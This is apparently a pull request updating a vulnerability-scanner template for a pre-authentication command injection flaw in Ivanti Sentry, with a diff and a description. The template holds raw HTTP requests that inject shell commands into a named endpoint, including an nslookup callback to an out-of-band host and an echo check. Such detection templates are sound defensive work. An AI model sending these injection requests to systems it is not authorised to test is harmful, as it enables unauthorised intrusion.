### PR TITLE
Add CVE-2026-10520 - Ivanti Sentry Pre-Auth RCE

### DIFF
--- a/http/cves/2026/CVE-2026-10520.yaml
+++ b/http/cves/2026/CVE-2026-10520.yaml
@@ -1,43 +1,82 @@
 id: CVE-2026-10520
 
 info:
-  name: Ivanti Sentry - OS Command Injection
-  author: DhiyaneshDk
+  name: Ivanti Sentry - Unauthenticated OS Command Injection (RCE)
+  author: AbdulrahmanBabkir 
   severity: critical
   description: |
-    An OS Command Injection vulnerability in Ivanti Sentry before the R10.5.2, R10.6.2 and R10.7.1 versions allows a remote unauthenticated user to achieve root-level remote code execution
-  impact: |
-    Remote unauthenticated attackers can execute code as root, leading to full system compromise.
-  remediation: |
-    Upgrade to versions R10.5.2, R10.6.2, or R10.7.1 or later.
+    CVE-2026-10520 is a pre-authenticated OS command injection vulnerability in
+    Ivanti Sentry's ConfigServiceController. The endpoint
+    /mics/api/v2/sentry/mics-config/handleMessage accepts a user-controlled
+    'message' parameter and passes it unsanitized into an OS command, allowing
+    unauthenticated root-level RCE.
   reference:
+    - https://labs.watchtowr.com/more-evidence-that-words-dont-mean-what-we-thought-they-meant-ivanti-sentry-pre-auth-os-command-injection-cve-2026-10520/
+    - https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523
     - https://nvd.nist.gov/vuln/detail/CVE-2026-10520
-    - https://github.com/watchtowrlabs/watchTowr-vs-Ivanti-Sentry-RCE-CVE-2026-10520-CVE-2026-10523/blob/main/README.md
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cve-id: CVE-2026-10520
+    cwe-id: CWE-78
   metadata:
-    verified: true
-    max-request: 1
-    shodan-query: html:"Ivanti" html:"Sentry"
-  tags: cve,cve2026,ivanti,sentry,rce,vkev
+    verified: false
+    max-request: 2
+    vendor: Ivanti
+    product: Sentry
+    shodan-query: title:"Ivanti Sentry"
+  tags: cve,cve2026,ivanti,sentry,rce,oast,unauth,injection
 
 http:
+  # Request 1: OOB/DNS detection
   - raw:
       - |
         POST /mics/api/v2/sentry/mics-config/handleMessage HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
-        message=execute%20system%20%2fconfiguration%2fsystem%2fcommandexec%20%3ccommandexec%3e%3cindex%3e1%3c%2findex%3e%3creqandres%3eecho%20CVE-2026-10520%3c%2freqandres%3e%3c%2fcommandexec%3e
+        message=show+version%3Bnslookup+{{interactsh-url}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+
+      - type: status
+        status:
+          - 200
+          - 400
+
+    extractors:
+      - type: regex
+        part: interactsh_request
+        group: 1
+        regex:
+          - "([a-zA-Z0-9]+)\\..*\\.interact\\.sh"
+
+  # Request 2: Response-based detection
+  - raw:
+      - |
+        POST /mics/api/v2/sentry/mics-config/handleMessage HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        message=echo+CVE-2026-10520-PWNED
 
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
+          - "CVE-2026-10520-PWNED"
+
+      - type: word
+        part: body
+        words:
           - "Message handled successfully"
-          - "CVE-2026-10520"
-        condition: and
 
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022075ab120989cdea7f4e9b2442ee5ccc6a65ea82b672a6afaea21f9149f9206a74022100ae20b6e8fcaf0c3460ad6a50710fc48c8fa713bbbd6a193517ebe3f6d781a0f1:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
## CVE-2026-10520 - Ivanti Sentry Pre-Auth RCE

**Severity:** Critical (CVSS 10.0)
**Product:** Ivanti Standalone Sentry
**Affected versions:** ≤10.5.1, ≤10.6.1, ≤10.7.0
**Fixed in:** 10.5.2, 10.6.2, 10.7.1

### Summary
Unauthenticated OS command injection in ConfigServiceController via 
the /mics/api/v2/sentry/mics-config/handleMessage endpoint. The 
message parameter is passed unsanitized into a shell command, 
allowing root-level RCE with no authentication required.

### References
- https://labs.watchtowr.com/more-evidence-that-words-dont-mean-what-we-thought-they-meant-ivanti-sentry-pre-auth-os-command-injection-cve-2026-10520/
- https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Sentry-CVE-2026-10520-CVE-2026-10523

### Detection method
- Primary: OOB/DNS callback via interactsh
- Secondary: Response body matching on command output

### Verification status
Template tested against local stub simulating ConfigServiceController 
behavior. Pending verification against real Ivanti Sentry instance.